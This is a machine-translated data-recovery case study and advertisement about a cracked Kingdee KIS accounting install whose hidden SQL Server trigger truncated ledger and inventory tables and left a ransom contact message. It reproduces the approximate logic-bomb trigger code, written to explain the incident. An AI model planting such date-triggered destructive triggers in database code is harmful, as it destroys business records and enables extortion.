"Customer name": Shandong Qingdao Fulong Hair Textile Co., Ltd.
"Software name": Kingdee Kis Professional Edition 12.2
"Database Version": MS SQL Server 2000 "database Size": 1GB.
"Problem description": Customers covet cheap, using cracked version of the financial software, cracked after the hidden back door, clear all the data triggers. After 1 years, the backdoor trigger was activated, deleting all account balances, inventory balances, inventory transactions, modified all general ledger vouchers, business vouchers, ledger accounts, content: Restore data Contact QQ 735330197,2251434429, make the database all paralyzed, all the account confusion. No backup, urgent need for annual report, urgent need to recover.
"Problem analysis": After the call, the customer sent to the back door to modify the database files, immediately organize the database analysis work, found in the database has a backdoor trigger T_log_autonumbe, the approximate code content is:
if (@FGLCurrYear =2014 and @FGLCurrPeriod >=1) or (@FICCurrYear =2014 and @FICCurrPeriod >=1)
Begin
if (@Flogdays >=15)
Begin
TRUNCATE TABLE t_voucherentry--Delete general ledger voucher
TRUNCATE Table T_balance--Delete account balance table
If @FVersion = ' 8.0 '--version greater than 8.0
TRUNCATE TABLE icstockbillentry--Delete the inventory out of the warehousing ledger
Else
TRUNCATE TABLE t_cc_stockbillentry--Delete inventory ledger
Drop Trigger T_log_autonumber
End
End
GO
Through the approximate code content, know the backdoor deleted what things, using what Method! Customer database files are MSDE for simple models, no logging, only on existing MDF files based on the recovery! Through our own research and development of the extraction tool, the relevant delete data, modify the data back back door operation, get the credential read and write log file, account balance table equals the table, by writing the corresponding separation program, the certificate is assembled, successfully restored back door modification data 95%.
"Recovery results": Send back to the customer test acceptance, feedback data is basically correct, can restore this degree, the customer is satisfied! Get the customer's great praise.
"Warm tip": Use cracked version of the software, the harm is very big. Intentioned the cracker, may leave the backdoor Trojan, delete modify data, extort money. If commercial, please use genuine software!
"Data Engineer" Yun Jun telephone//qq:18302650920 Welcome to come to inquire to discuss data recovery.
1, the system crashes only the SQL Server data files in the case of recovery. That is, no log files or log file corruption in the case of recovery
2, the SQL Server data file has a bad page in the case of recovery.
3, in SQL Server2000, SqlServer2005, SQL2008 run in simple log mode, full log mode or bulk logging mode data is mistakenly (drop, delete, truncate) Delete table recovery, Data recovery after updata, etc.
4. SQL serve files cannot be appended with data recovery.
5. SQL Server database is marked as suspect, unavailable, etc.
6, Sql Server2000, SqlServer2005, SQL2008 database sysobjects and other system table corruption can not be applied in the case of recovery.
7. The SQL Server database recovers only if the data files do not have any logs .
8. The recovery of SQL Server data files is deleted by mistake.
9, SQL Server2000, SQL Server2005, SQL2008 database master database is corrupted and cannot be resumed under normal operation condition.
10, SQL Server restore times consistency error, error 823 and other cases of data recovery, various error prompt database file repair
11. Recoverable database damage caused by bad drive
12. Can repair the database after the log shrinkage or sudden power outage
13. Can recover multiple relational databases
14. Recoverable SQL database bkf backup file and bak file
15. Database recovery in case of mis-formatting of SQL Server database on disk array
16, SQL Server database can be formatted, mistakenly deleted, all market recovery software can not restore the situation of recovery, that is, the fragment-level database extraction recovery.
17, recoverable shade ransomware virus file poisoning is encrypted, database file anti-blackmail service.
Kingdee Kis Professional Edition replaced SXS.dll by the backdoor emptying data was modified to "recover data contact QQ 735330197,2251434429" fix tool.